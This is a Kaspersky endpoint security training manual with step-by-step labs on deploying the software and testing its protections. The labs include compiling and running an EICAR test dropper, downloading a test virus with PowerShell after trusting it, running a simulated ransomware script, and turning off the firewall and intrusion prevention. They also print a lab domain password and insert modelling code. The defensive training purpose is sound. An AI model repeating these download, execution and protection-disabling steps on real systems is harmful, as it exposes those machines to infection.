
KL 002.11.6: Kaspersky Endpoint Security and Management.

Lab 1. How to install Kaspersky Security Center
    Task A: Install the Administration Server and Web Console of Kaspersky Security Center
    Task B: Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server
Lab 2. How to deploy Kaspersky Endpoint Security
    Task A: Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server
    Task B: Create a stand-alone installation package for Kaspersky Endpoint Security
    Task C: Install a stand-alone package of Kaspersky Endpoint Security for Windows on a laptop
    Task D: Study the results of deploying protection in the network
Lab 3. How to create a structure for the managed computers
    Task A: Create groups for workstations, laptops and servers
    Task B: Configure rules to move computers into the groups
Lab 4. How to test protection of Windows Subsystem for Linux
Lab 5. How to configure Mail Threat Protection
    Task A: Send a message with an executable file
    Task B: Edit the attachment filter
    Task C: Make sure that Mail Threat Protection does not edit attachments anymore
Lab 6. How to test Web Threat Protection
    Task A: Make sure that Web Threat Protection scans https traffic by default
    Task B: Turn off encrypted traffic scanning for the PowerShell application
    Task C: Make sure that Web Threat Protection allows the trusted application PowerShell to download the test virus over https
Lab 7. How to test protection of network folders against ransomware
    Task A: Simulate a ransomware infection
    Task B: Check how the Behavior Detection component reacted on the Tom-Laptop machine
    Task C: Allow encryption within network shared folders and configure exclusions for trusted network devices
    Task D: Make sure that exclusions for trusted network devices work correctly
Lab 8. How to test protection against fileless threats
Lab 9. How to check health of Exploit Prevention
    Task A: Simulate a hacker attack to get access to a remote computer
    Task B: Disable some of the protection components
    Task C: Test protection against exploits
Lab 10. Improve workstations’ protection against ransomware
    Task A: Simulate a ransomware infection
    Task B: Prohibit all programs except for trusted from editing and deleting documents
    Task C: Configure storing events on the Administration Server
    Task D: Simulate encrypting a document and check the result
Lab 11. How to test Network Threat Protection
    Task A: Disable Exploit Prevention
    Task B: Simulate a hacker attack by exploiting an SMB vulnerability and get access to a remote computer
    Task C: Study the Network attack report
    Task D: Unblock the Kali computer
    Task E: Configure exclusions in the properties of Network Threat Protection
    Task F: Imitate an attack from Kali on Alex-Desktop and check the results
Lab 12. How to configure password protection
    Task A: Find a computer where protection is disabled
    Task B: Protect Kaspersky Endpoint Security with a password
    Task C: Make sure that Kaspersky Endpoint Security is password-protected
    Task D: Set a password for Network Agent uninstallation
Lab 13. How to configure Application Control
    Task A: Create a category for all web browsers except Internet Explorer
    Task B: Prohibit the users from starting any browsers except for Internet Explorer
    Task C: Start Mozilla Firefox and Internet Explorer
Lab 14. How to block start of unknown applications in the network
    Task A: Create an application category that prohibits starting unknown files
    Task B: Change the policy so as to prohibit all users from starting unknown files
    Task C: Make sure that the settings work correctly
Lab 15. How to block USB flash drives
    Task A: Configure blocking USB flash drives
    Task B: Test blocking USB flash drives
    Task C: Receive the request from the user
Lab 16. How to configure granular permissions for USB flash drives
    Task A: Prohibit all users from writing files to USB flash drives
    Task B: Allow domain users to write files to trusted USB flash drives
Lab 17. How to configure web access control
    Task A: Create a rule to block access to cryptocurrency exchange websites
    Task B: Test whether access to cryptocurrency exchange websites is blocked
    Task C: Consult reports in Kaspersky Security Center
Lab 18. How to configure Adaptive Anomaly Control
    Task A: Configure blocking macros and scripts in office documents
    Task B: Make sure that Adaptive Anomaly Control blocks a malicious macro
Lab 19. How to configure the dashboard
    Task A: Add new widgets to the dashboard
    Task B: Delete and rearrange widgets
Lab 20. How to configure maintenance tools
    Task A: Delete unused reports
    Task B: Create a weekly report about infected computers
    Task C: Configure the most important reports to be emailed
Lab 21. How to collect diagnostic information
KL 002.11.6: Lab 1.
Kaspersky Endpoint Security and Management How to install Kaspersky Security Center

Scenario. You need to protect less than 100 computers with Kaspersky Endpoint Security for Business at ABC
Inc. One Administration Server and the Express edition of Microsoft SQL Server are enough for managing
protection within such a network. Install Kaspersky Security Center Administration Server on a dedicated computer
running Windows Server 2016. Microsoft SQL server has been installed on the virtual machine beforehand.
Contents. In this lab, we will:
Install the Administration Server and other Kaspersky Security Center components
Proceed through the Quick Start Wizard to configure Kaspersky Security Center Administration Server

Install Kaspersky Security Center Administration Server with the default settings. The Web Console is
implemented as an independent component that has a separate distribution; its installer starts automatically as
soon as the KSC Administration Server installation completes.

The KSC and DC machines must be powered on.

The task is performed on KSC.

Start the Kaspersky Security Center installer: Desktop\ksc_13_13.0.0.11247_full_en.exe
Click Install Kaspersky Security Center

On the welcome page, click Next

On the following page, make sure that the required version of .NET Framework is installed and click Next

Accept the License Agreement and the Privacy Policy. Click Next

Select Standard installation and click Next

Select Install both Administration Consoles and click Next

Keep the option Fewer than 100 networked devices selected and click Next

Select Microsoft SQL Server and click Next

Click Browse

Select the KSC\SQLEXPRESS server and click OK

To proceed with the installation of Kaspersky Security Center, click Next

Select Microsoft Windows Authentication mode and click Next

To begin the installation, click Install

As soon as KSC Administration Server is installed, the KSC Web Console installer starts automatically. Select a language for the installation wizard

On the welcome page, click Next

Accept the license agreement and click Next

Do not change the destination folder
Click Next

Specify the connection address: 127.0.0.1
Do not change the port
Click Test

Make sure that port 8080 is accessible on 127.0.0.1
Click OK

Leave these settings unchanged
Click Next

Select Generate new certificate
Click Next

Make sure that KSC is specified in the list of trusted Administration Servers
Click Next to proceed with the installation

To begin the installation, click Install

Close the Kaspersky Security Center Web Console Setup Wizard: Click Finish

Close the Kaspersky Security Center Administration Server Setup Wizard: Click Finish

Connect to the Administration Server using Kaspersky Security Center Web Console and proceed through the
Quick Start Wizard. Add an activation code. Configure notifications to administrator@abc.lab via SMTP server
10.28.0.10. Accept the KSN agreement. Download signature updates. Do not start the Remote Installation Wizard.
Enable automatic distribution for the license.

The task is performed on KSC.

Start the Google Chrome browser. In the address bar, type https://127.0.0.1:8080
Click Advanced
Click the link Proceed to 127.0.0.1 (unsafe)

Enter the username abc\administrator and password Ka5per5Ky
Click the button Sign in

Skip the tutorial. Click X to close it

On the welcome page of the wizard, click Start

We will not use a proxy server. Click Next

Click Next

Select Workstations and Windows
Click Next

Select Lite encryption (56-bit)
Click Next

Select the Workstations Web plug-in of Kaspersky Endpoint Security
Click Next

Click Next

Select the Kaspersky Endpoint Security for Windows package with lite encryption
Click Next

Agree to use KSN
Click Next

Select Add key file
Click Enter activation code and specify the code (Desktop\Key_File.key)

Select the checkbox Automatically distribute license key to managed devices
Click Next

Click Next

Click Create, then Next

For the Email addresses of recipients, enter administrator@abc.lab
For the SMTP server address, specify 10.28.0.10
For the SMTP server port, specify 25
Click Next

Click Next

Clear the checkbox Run Protection Deployment Wizard
Click Finish

You installed the Administration Server, Kaspersky Security Center Web Console and management plug-in for
Kaspersky Endpoint Security. Also, you completed the Quick Start Wizard: created the default tasks and
policies, accepted the KSN agreement, configured notifications for the administrator and enabled
autodistribution for the key.

Further labs will teach you how to install Kaspersky Endpoint Security and Network Agent.
KL 002.11.6: Lab 2.
Kaspersky Endpoint Security and Management How to deploy Kaspersky Endpoint Security

Scenario. You need to install Kaspersky Endpoint Security on the network computers. You have installed the
Kaspersky Security Center Administration Server already. Now, use the Remote Installation Wizard to install
Kaspersky Endpoint Security and Network Agent on the computers discovered by the Administration Server.

Contents. In this lab, we will:
Install Kaspersky Endpoint Security for Windows on a workstation and Kaspersky Security Center Administration Server
Create a stand-alone installation package for Kaspersky Endpoint Security
Install a stand-alone package of Kaspersky Endpoint Security for Windows on a laptop
Study the results of deploying protection in the network

Run the Remote Installation Wizard and select the Kaspersky Endpoint Security package. To be able to access
the computers, specify the domain administrator account ABC\Administrator and password Ka5per5Ky. Leave the
other settings unchanged.

Wait for the task to install the applications. If the task prompts you to restart a computer, act as a user and restart it.

Any third-party antivirus could be installed on the Alex computer, which may theoretically complicate installation. However, the installation task can automatically uninstall the third-party software.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

Go to Discovery & Deployment | Deployment & Assignment | Installation Packages | In progress tab
Click the link Kaspersky Endpoint Security for Windows

Wait for the button Show EULA to appear and click it

Select the checkboxes and click Accept to accept the License Agreements
Wait for the package to download

On the side menu, select Devices | Policies & Profiles
Select the policy of Kaspersky Security Center Network Agent

Switch to the Application Settings tab and open the Network section
Open the Connectivity settings

Set the Synchronization interval (min) to 3

The synchronization interval is changed to speed up demonstration during our labs. We don’t recommend that you reduce it in the production environment

Select OK

Click Save

On the side menu, select Discovery & Deployment | Deployment & Assignment | Protection Deployment Wizard

Select Kaspersky Endpoint Security for Windows in the list of installation packages
Click Next

Select Do not add license key to installation package
Click Next

Select Kaspersky Security Center 13 Network Agent
Click Next

Click Select devices for installation
Expand the Managed devices node. Find and select the KSC computer
Expand the Unassigned devices list. Find and select the Alex-Desktop computer
Click Next

Without changing the package copying parameters, click Next

Click Next without changing the restart parameters

Agree to uninstall incompatible applications and click Next

Agree to Move unassigned devices to group after the installation, select Managed devices and click Next

To specify the name and password of an administrator who can access the computers, select Account required (Network Agent is not used)
Click Add to specify an account

Type the abc\administrator username and Ka5per5Ky password and click OK
Click Next

Select the checkbox Run the task after the Wizard finishes
Click OK

On the side menu, select Devices | Tasks
Click the installation task of Kaspersky Endpoint Security for Windows: Remote installation task

Make sure that the task is running on two computers

Wait for the notification that the computers have to be restarted to complete the task successfully

Open the list of installation packages. Select the Kaspersky Endpoint Security package. Start the stand-alone
package creation wizard. Add the Network Agent to the installation package and select the group into which
the target computers are to be moved after the installation.

The task is performed on KSC.

Switch to Discovery & Deployment | Deployment & Assignment | Installation Packages
Select the Kaspersky Endpoint Security for Windows installation package
Click the Deploy button

Select Using a stand-alone package
Click Next

Select Install Network Agent together with this application
Click Next

Configure relocation: Select Move unassigned devices to this group
Click Select group

Select Managed devices
Click OK
Click Next

The page that opens shows the path to the installation file
Click Finish to close the wizard

From the client computer, open the KLSHARE folder on the Administration Server. Find and run the stand-alone package.

The task is performed on Tom-Laptop.

On the Tom-Laptop machine, start Windows Explorer
Open the shared folder \\KSC\klshare\PkgInst\

Run the installer
Click Start installation

Wait for the installation to complete and click OK to close the window

Study the results of the installation task. Make sure that the computers have been moved to the Managed devices
group. Make sure that Network Agent and Kaspersky Endpoint Security are installed on the computers.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Monitoring & Reporting | Reports

Click Report on Kaspersky software versions
Make sure that it displays three instances of Kaspersky Endpoint Security and three instances of Network Agent, exactly the same number as there are network computers
Close the report

You have installed Kaspersky Endpoint Security and Network Agent using the remote installation wizard and
a stand-alone package.

If an antivirus by another manufacturer is installed on a computer, the installer will uninstall it and prompt to
restart the machine.

If a firewall is running on a computer or you haven’t specified an account that has administrative permissions on
the target machines, the installation will return an error.

KL 002.11.6: Lab 3.
Kaspersky Endpoint Security and Management How to create a structure for the managed computers

Scenario. You have installed protection on the network computers and you want to configure it optimally. Assuming
that servers, desktops and laptops need different settings, create respective groups for them and move the computers
there. To save effort in hand-moving the computers into their appropriate groups, create relocation rules and configure
conditions based on the operating systems and network parameters of the computers.

Contents. In this lab, we will:
Create groups for workstations, laptops and servers
Configure rules to move computers into the groups

Create Servers and Workstations subgroups in the Managed devices container. Then create Desktops
and Laptops subgroups within the Workstations group.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

The task is performed on KSC.

On the side menu, select Devices | Hierarchy of groups
Select the group Managed devices
To add a subgroup, click Add

Type Servers for the group name and click Add

Create another subgroup named Workstations
Select the Workstations group and click Add

Type Desktops for the group name
Repeat the previous two steps to create the Laptops group

Open the list of rules in the properties of the Unassigned devices node. Create a rule for all computers that will
work permanently and move servers to the Servers group. Use the Network agent is running condition (Yes)
and the Operating system version condition with the Windows Server 2016 value. You can find both conditions
on the Applications tab.

Create similar rules that will move computers to the Desktops and Laptops groups respectively. Instead of
the Operating system version, use the IP Range condition on the Network tab. For desktop computers,
specify range 10.28.0.100–10.28.0.199; and for laptops, 10.28.0.200–10.28.0.254.

The task is performed on KSC.

Go to Discovery & Deployment | Deployment & Assignment | Moving rules
Click Add

Type Servers for the rule name
Specify the destination group: On the drop-down list, select the Managed devices | Servers subgroup
Select the mode Apply rule continuously
To apply the rule to all computers, clear the checkbox Move only devices that do not belong to an administration group

Select the Enable rule checkbox

Open Rule conditions
Switch to the Applications tab
Specify that the Network Agent is installed: On the respective drop-down list, select Yes
To apply the rule to computers with server operating systems, enable the Operating system version parameter
Scroll the list to the bottom and switch to the second page
Select the operating system Microsoft Windows Server 2016
Click Save to save the rule

Click Add to create a rule for desktops

Type Desktops for the rule name
Specify the destination group: On the drop-down list, select the Managed devices | Workstations | Desktops subgroup
Select the mode Apply rule continuously
To apply the rule to all computers, clear the checkbox Move only devices that do not belong to an administration group

Select the Enable rule checkbox

Switch to the Rule Conditions tab
To configure conditions for IP addresses, switch to the Network tab
To apply the rule to the computers whose addresses belong to a specific interval, select the IP range checkbox
Specify IP range 10.28.0.100–10.28.0.199

Switch to the Applications tab
Specify that the Network Agent is installed: On the respective drop-down list, select Yes
Click Save to save the rule

Create a rule named Laptops
Specify the destination group: On the drop-down list, select the Managed devices | Workstations | Laptops subgroup
Select the mode Apply rule continuously
Clear the checkbox Move only devices that do not belong to an administration group

Select the Enable rule checkbox

Open the Rule conditions tab
Switch to the Network tab
Select the IP range checkbox
Specify IP range 10.28.0.200–10.28.0.254

Switch to the Applications section
Specify that the Network Agent is installed: On the respective drop-down list, select Yes
Click Save to save the rule

Make sure that there are five relocation rules in the list: Two have been created automatically for installation packages, and three by you

Go to Devices | Managed Devices
At the top of the page, click the path KSC / Managed Devices
On the group structure tree, select KSC | Managed devices | Servers

Make sure that the KSC computer, which is running the Windows Server 2016 operating system, has been automatically moved to the Servers group

In a similar manner, make sure that the other computers have been moved to their respective groups
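The three moving rules configured in this lab, modelled as an added example (not Kaspersky code and not from the manual). Only the Network Agent condition, the operating system value and the two IP ranges come from the lab; the inventory with its IP addresses, and the assumption that the first enabled rule in list order decides a device's destination, are constructed for the model.

```python
"""Model of the Lab 3 relocation rules. Added example, not Kaspersky code.

Assumptions (not taken from the manual): rules are evaluated in list order and
the first enabled rule whose conditions all hold decides; the inventory below,
including every IP address, is constructed for the demonstration.
"""
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import Callable, Dict, List, Optional

SERVER_2016 = "Microsoft Windows Server 2016"


@dataclass
class Device:
    name: str
    ip: str
    os: str
    agent_running: bool
    group: Optional[str] = None  # None models the Unassigned devices node


@dataclass
class MoveRule:
    name: str
    target_group: str
    conditions: List[Callable[[Device], bool]]
    enabled: bool = True
    # "Move only devices that do not belong to an administration group";
    # the lab clears this checkbox for all three rules
    only_unassigned: bool = False

    def matches(self, dev: Device) -> bool:
        if not self.enabled:
            return False
        if self.only_unassigned and dev.group is not None:
            return False
        return all(cond(dev) for cond in self.conditions)


# Rule conditions as found on the Applications and Network tabs
def agent_running() -> Callable[[Device], bool]:
    return lambda d: d.agent_running


def os_version(name: str) -> Callable[[Device], bool]:
    return lambda d: d.os == name


def ip_range(first: str, last: str) -> Callable[[Device], bool]:
    lo, hi = IPv4Address(first), IPv4Address(last)

    def check(d: Device) -> bool:
        try:
            return lo <= IPv4Address(d.ip) <= hi
        except ValueError:  # a malformed address never matches
            return False

    return check


# The three rules created in the lab, in the order they were created
LAB_RULES = [
    MoveRule("Servers", "Managed devices/Servers",
             [agent_running(), os_version(SERVER_2016)]),
    MoveRule("Desktops", "Managed devices/Workstations/Desktops",
             [agent_running(), ip_range("10.28.0.100", "10.28.0.199")]),
    MoveRule("Laptops", "Managed devices/Workstations/Laptops",
             [agent_running(), ip_range("10.28.0.200", "10.28.0.254")]),
]

# Constructed inventory; the addresses are illustrative and not from the manual
INVENTORY = [
    Device("KSC", "10.28.0.10", SERVER_2016, True, "Managed devices"),
    Device("Alex-Desktop", "10.28.0.150", "Microsoft Windows 10", True, "Managed devices"),
    Device("Tom-Laptop", "10.28.0.210", "Microsoft Windows 10", True, "Managed devices"),
    Device("DC", "10.28.0.11", SERVER_2016, False),                 # no Network Agent
    Device("FileSrv", "10.28.0.120", SERVER_2016, True),            # server inside the desktop range
    Device("Guest-PC", "10.28.0.55", "Microsoft Windows 10", True),  # outside both ranges
]


def apply_rules(devices: List[Device], rules: List[MoveRule]) -> Dict[str, Optional[str]]:
    """Return the destination group per device; devices matching no rule stay put."""
    result = {}
    for dev in devices:
        dest = dev.group
        for rule in rules:
            if rule.matches(dev):
                dest = rule.target_group
                break
        result[dev.name] = dest
    return result


def destination_with_desktops_first() -> Optional[str]:
    """Why rule order matters: with Desktops evaluated before Servers, the
    server at 10.28.0.120 would land in the Desktops group."""
    reordered = [LAB_RULES[1], LAB_RULES[0], LAB_RULES[2]]
    return apply_rules(INVENTORY, reordered)["FileSrv"]


if __name__ == "__main__":
    for name, group in apply_rules(INVENTORY, LAB_RULES).items():
        print(f"{name:13s} -> {group}")
    print("FileSrv with Desktops rule first ->", destination_with_desktops_first())
```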

You installed protection and organized the computers into groups. The default settings are optimized for an
average user of Kaspersky Endpoint Security. They reliably protect computers and minimize the performance
impact. You can adjust the protection-comfort balance as necessary: Reinforce protection in some aspects, and
maybe make concessions in some others aiming to improve the user experience. Further labs will explain how
to fine-tune the protection settings.

KL 002.11.6: Lab 4.
Kaspersky Endpoint Security and Management How to test protection of Windows Subsystem for Linux

Scenario. By default, Kaspersky Endpoint Security supports Windows Subsystem for Linux: It is a compatibility
layer for running Linux applications in the latest versions of Microsoft Windows. In our environment, Windows
Subsystem for Linux is based on Kali Linux 2018. We will run a test malicious file in Windows Subsystem for
Linux and make sure that Kaspersky Security for Windows Server detects and deletes it.

In this lab, we will try to compile a loader for eicar.com within Windows Subsystem for Linux that is running
under Windows 10.

The KSC, DC and Tom-Laptop machines must be powered on.

The task is performed on Tom-Laptop.

Press WIN+R
Type wsl
Click OK

Copy the eicar dropper’s source code to the /tmp folder:
cp /mnt/c/temp/eicar_drop_kl_edu.cpp /tmp/

Go to the /tmp directory:
cd /tmp/

Compile the eicar dropper using the g++ compiler:
g++ eicar_drop_kl_edu.cpp -o eicar_dropper

Run the compiled eicar dropper:
./eicar_dropper

Click the Kaspersky Endpoint Security icon in the notification area or on the Start menu to open the Kaspersky Endpoint Security interface

Click Reports

Select the File Threat Protection report
Find the threat detection event
Find the results of processing this threat

This lab demonstrates how Kaspersky Endpoint Security can detect malicious files that are saved or created
within Windows Subsystem for Linux.
KL 002.11.6: Lab 5.
Kaspersky Endpoint Security and Management How to configure Mail Threat Protection

Scenario. When an administrator emails an executable file to a user who is to run it and thus solve an issue, Kaspersky Endpoint Security renames the attachment. To save time and avoid explaining to the users how to rename the files back, configure Mail Threat Protection not to rename files. At the same time, criminals often use files with a double extension to trick users into running a malicious executable disguised as a document. Such files should be deleted.

Contents. In this lab, configure Mail Threat Protection not to rename attached *.exe files and to delete files with the double extension *.pdf.exe.

Send a message with an executable file
Edit the attachment filter
Make sure that Mail Threat Protection does not edit attachments anymore

Send a message to tom@abc.lab with a zipped *.pdf.exe file attached. Receive the message and make sure
that Mail Threat Protection has changed the extension of the archived file.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

Start the task on the Alex-Desktop machine.

Connect to Alex-Desktop.
Open Outlook
Create a new message:
— Specify the address. In the To: box, type tom@abc.lab
— In the Subject: box, type Weekly report
— Attach the Document1.zip file to the message (Z:\LabFiles\Lab5)
Click Send to dispatch the message

Switch to the Tom-Laptop machine

Run Microsoft Outlook.
Select the received message
Save the Document1.zip file to the desktop
Unpack the Document1.zip archive (select the Extract all command on the file’s shortcut menu)
Note that the archived file is named Document1.pdf.ex_. Mail Threat Protection has changed the extension of the archived executable file

In Kaspersky Endpoint Security policy, edit the list of attachment formats that Mail Threat Protection processes.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application settings tab
Go to the Essential Threat Protection section
Open the Mail Threat Protection settings

Reconfigure attachment filtering. Choose Delete attachments of selected types

Scroll the list down
Disable processing *.exe

Create a new attachment filter: Click Add
In the Extension field, type *.pdf.exe
Click OK

Start the task on the Alex-Desktop machine.

On the Alex-Desktop machine, create another message. Attach the Procmon.zip file (ask the instructor where this file is located)
In the Subject: box, type IT Service Desk
Click Send

Switch to the Tom-Laptop machine

Open Microsoft Outlook
Save the Procmon.zip file to the desktop
Unpack the Procmon.zip archive (select the Extract all command on the file’s shortcut menu)
Note that in the new message, the archived file is named Procmon.exe; Mail Threat Protection has not renamed it

You have configured Mail Threat Protection not to rename .exe files.

If the network is being attacked through email by a new virus that has not yet been added to either the signature database or KSN, configure Mail Threat Protection to rename or delete all executable attachments.
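The behaviour observed in this lab (Document1.pdf.exe renamed to Document1.pdf.ex_ under the default filter, Procmon.exe left alone and *.pdf.exe deleted after reconfiguration) can be modelled to see how the two filter configurations differ. The Python below is an added example and not Kaspersky code: the masks, actions and the .ex_ renaming come from the lab; the rule that the most specific matching mask wins is an assumption of this model, not a documented product rule.

```python
"""Model of the Mail Threat Protection attachment filter configured in this lab.

Added example, not Kaspersky code. Masks, actions and the ".ex_" renaming are
taken from what the lab shows; "the most specific matching mask wins" is an
assumption of this model, not a documented product rule.
"""
from fnmatch import fnmatchcase
from typing import Dict, Iterable, Optional, Tuple

RENAME = "rename"   # Rename attachments of selected types
DELETE = "delete"   # Delete attachments of selected types
PASS = "pass"       # mask disabled: attachment left untouched

# Behaviour described in the scenario: executables get renamed.
DEFAULT_FILTER: Dict[str, str] = {"*.exe": RENAME}

# Configuration the lab ends with: *.exe processing disabled,
# the double-extension mask *.pdf.exe added and set to delete.
LAB_FILTER: Dict[str, str] = {"*.exe": PASS, "*.pdf.exe": DELETE}

# Document extensions a double-extension trick usually imitates (constructed list).
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}


def rename_extension(name: str) -> str:
    """The rename the lab observed: Document1.pdf.exe -> Document1.pdf.ex_.
    The last character of the extension becomes an underscore, so the file
    no longer runs on double-click but the user can rename it back."""
    stem, dot, ext = name.rpartition(".")
    if not dot or not ext:
        return name
    return f"{stem}.{ext[:-1]}_"


def match_mask(name: str, masks: Iterable[str]) -> Optional[str]:
    """Return the most specific matching mask (the one with the most dots).
    *.exe also matches Document1.pdf.exe, so *.pdf.exe must take precedence
    for the lab's configuration to delete double extensions while *.exe is
    disabled."""
    hits = [m for m in masks if fnmatchcase(name.lower(), m.lower())]
    return max(hits, key=lambda m: m.count("."), default=None)


def apply_filter(name: str, filt: Dict[str, str]) -> Tuple[str, Optional[str]]:
    """Decide what happens to an attachment (or to a file inside an attached
    archive). Returns (action, resulting file name); the name is None when
    the attachment is deleted."""
    mask = match_mask(name, filt)
    if mask is None:
        return PASS, name
    action = filt[mask]
    if action == DELETE:
        return DELETE, None
    if action == RENAME:
        return RENAME, rename_extension(name)
    return PASS, name


def is_double_extension(name: str) -> bool:
    """Heuristic for the trick the scenario warns about: a document extension
    immediately followed by .exe, e.g. Weekly report.pdf.exe."""
    parts = name.lower().split(".")
    return len(parts) >= 3 and parts[-1] == "exe" and parts[-2] in DOCUMENT_EXTENSIONS


if __name__ == "__main__":
    # Constructed sample attachments, including the two files the lab sends.
    for sample in ("Document1.pdf.exe", "Procmon.exe", "Weekly report.docx"):
        print(sample, "default ->", apply_filter(sample, DEFAULT_FILTER),
              "lab ->", apply_filter(sample, LAB_FILTER),
              "double extension:", is_double_extension(sample))
```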
Lab 6. How to test Web Threat Protection

Scenario. Kaspersky Endpoint Security can scan https traffic under the default settings. It replaces the certificate for this purpose, which may sometimes affect banking or other software that uses its own certificate. To avoid such interaction issues, Kaspersky Endpoint Security permits excluding encrypted traffic from scanning.

Contents. In this lab, we will:

Make sure that Web Threat Protection scans https traffic under the default settings
Turn off encrypted traffic scanning for the PowerShell application
Make sure that Web Threat Protection allows the trusted application PowerShell to download the
test virus over https

Run PowerShell, try to download the eicar_com.zip file and check how Kaspersky Endpoint Security will react.

The DC, KSC and Tom-Laptop machines must be powered on.

The task is performed on Tom-Laptop.

Press WIN+R
Type powershell
Click OK

Download the eicar_com.zip file via PowerShell over https. Carry out the following command:
Invoke-WebRequest -Uri "https://secure.eicar.org/eicar_com.zip" -OutFile "C:\temp\eicar_com.zip"

Make sure that Kaspersky Endpoint Security has blocked the download. Do not close the PowerShell
window

Add PowerShell to the list of trusted applications, try to download the eicar_com.zip file and check how
Kaspersky Endpoint Security will react.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application settings tab
Go to the General settings section
Open Exclusions

To add a trusted application, click the link Trusted applications in the lower-left part of the page
Click Add

For the application path, type %systemroot%\system32\WindowsPowershell\v1.0\powershell.exe
Clear the following checkboxes:
— Do not scan opened files
— Do not inherit restrictions of the parent process (application)
Select Do not scan network traffic and Encrypted traffic only
Click OK three times to save the exclusion

Click Save to save the policy
Confirm that you want to use the specified settings: Click Yes
Wait for the policy to be applied

Download the eicar_com.zip file from the www.eicar.org website through the PowerShell application once again.
Make sure that Web Threat Protection will not block the test virus if it is downloaded via a trusted application.

The task is performed on Tom-Laptop.

Download eicar_com.zip over the https secure protocol one more time. Carry out the following command:
Invoke-WebRequest -Uri "https://secure.eicar.org/eicar_com.zip" -OutFile "C:\temp\eicar_com.zip"
To make sure that the file has been saved successfully, open the C:\temp\ directory
Close the PowerShell window

This lab demonstrates how to add an application to the trust list and prevent scanning its encrypted traffic.

The option Do not scan network traffic configured for trusted programs applies to the Mail Threat Protection, Web Threat Protection and Web Control components, and does not influence the Firewall or Network Threat Protection.

Lab 7. How to test protection of network folders against ransomware

Scenario. Of all threats, you are most concerned about ransomware that encrypts data in shared folders. If
Kaspersky Endpoint Security fails to detect a new malware version one day, the company will lose much
money. You want to use the Behavior Detection protection component to counter ransomware.

Contents. In this lab, we will:

Simulate a ransomware infection
Check how the Behavior Detection protection component reacted
Allow encryption within network shared folders and configure exclusions for network devices
Make sure that exclusions for network devices work correctly

Disable other protection components that can block the test file earlier than Behavior Detection. Find the ransomware2.bat script on the desktop of the Alex-Desktop computer and run it. It imitates ransomware: it encrypts files in shared network folders and deletes the originals.

Make sure that Kaspersky Endpoint Security has restored the file invoice.txt, and Alex cannot modify files in
the network shared folder anymore.

The KSC, DC, Alex-Desktop and Tom-Laptop machines must be powered on.

Start the task on the KSC machine.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application Settings tab
In the Advanced Threat Protection section, click Host Intrusion Prevention

Disable Host Intrusion Prevention
Click OK

In the Essential Threat Protection section, click Firewall

Disable Firewall
Click OK

Save the settings: Click Save
Confirm that you want to use the specified settings: Click Yes
Wait for the policy to be applied
Restart the Tom-Laptop computer

Switch to the Alex-Desktop machine.

Open the shared folder \\tom-laptop\temp
Make sure that the invoice.txt file is there

Find the ransomware2.bat file on the desktop. It imitates actions of file encrypting ransomware

Run the ransomware2.bat file

Check the contents of the folder \\tom-laptop\temp

Open the invoice.txt.aes file in Notepad
Make sure that the invoice.txt.aes file is encrypted
Close Notepad

Refresh the contents of the folder \\tom-laptop\temp
Make sure that the invoice.txt file has been restored

In some cases, the original invoice.txt file remains intact because Behavior Detection blocks the remote connection as soon as it detects the encryption attempt, which may happen before the script deletes the original file.

Try to delete the encrypted file
Make sure that access is denied

Consult the report of the Behavior Detection protection component on Tom-Laptop. Note the actions that
the protection component performed.

The task is performed on Tom-Laptop.

Log on to the abc\Tom account, password Ka5per5Ky
Open the Kaspersky Endpoint Security interface
Open the application reports
Select Behavior Detection
Make sure that the malicious encryption activity attempted from IP 10.28.0.100 was blocked

Make sure that the C:\temp\invoice.txt file was restored

In some cases, Behavior Detection may consider operations performed by design engineering applications to be crypto ransomware activity. To prevent false positives, we recommend that you add such computers to the list of exclusions.

Select the Administration Server and edit the Kaspersky Endpoint Security policy. Add the IP address of the Alex-
Desktop computer to the list of exclusions of the Behavior Detection component.

The task is performed on KSC.

Open Kaspersky Security Center Web Console
On the side menu, select Devices | Policies & Profiles
Open the policy of Kaspersky Endpoint Security for Windows

Switch to the Application settings tab
In the Advanced Threat Protection section, click Behavior detection

Reconfigure protection of shared folders against external encryption: Switch the action from Block connection to Notify
To create an exclusion, click Add

Create an exclusion. Type the IP address of the Alex-Desktop workstation (10.28.0.100)
Click OK twice
Save the changes to the policy

The task is performed on Alex-Desktop.

Open the folder \\tom-laptop\temp\
Delete the file invoice.txt.aes

If the file cannot be deleted, delete it on Tom-Laptop

Find the ransomware2.bat file on the desktop and run it

Make sure that the invoice.txt file has been encrypted and the original invoice.txt file has not been restored
Delete the file invoice.txt.aes
Make sure that the file has been deleted correctly

In this lab, we demonstrated that Kaspersky Endpoint Security can detect malicious ransomware activity with
the default settings. The Behavior Detection component takes care of that.

If necessary, the administrator can always specify exclusions for the protection component and allow
specific network devices to encrypt files in shared folders.
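The two runs of this lab (Block connection with no exclusions, then Notify with Alex-Desktop's address excluded) can be replayed against a constructed stream of SMB file operations to see why the first run restores invoice.txt and denies the later delete, while the second run lets the encryption through. The Python below is an added example and not Kaspersky code: the IPs, file names, actions and exclusion list come from the lab, the event stream is constructed, and the detection rule (a remote client writes an encrypted twin of a file and then deletes the original) is a simplified stand-in for the product's heuristics.

```python
"""Model of Behavior Detection's protection of shared folders against external
encryption. Added example, not Kaspersky code; see the lead-in for assumptions.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

BLOCK_CONNECTION = "Block connection"   # default action in the lab
NOTIFY = "Notify"                       # action the lab switches to
EXCLUDED = "Allowed (excluded device)"
ENCRYPTED_SUFFIX = ".aes"               # what ransomware2.bat appends


@dataclass
class FileEvent:
    remote_ip: str   # SMB client that performed the operation
    op: str          # "create", "write" or "delete"
    path: str        # path inside the share, e.g. "temp/invoice.txt"


@dataclass
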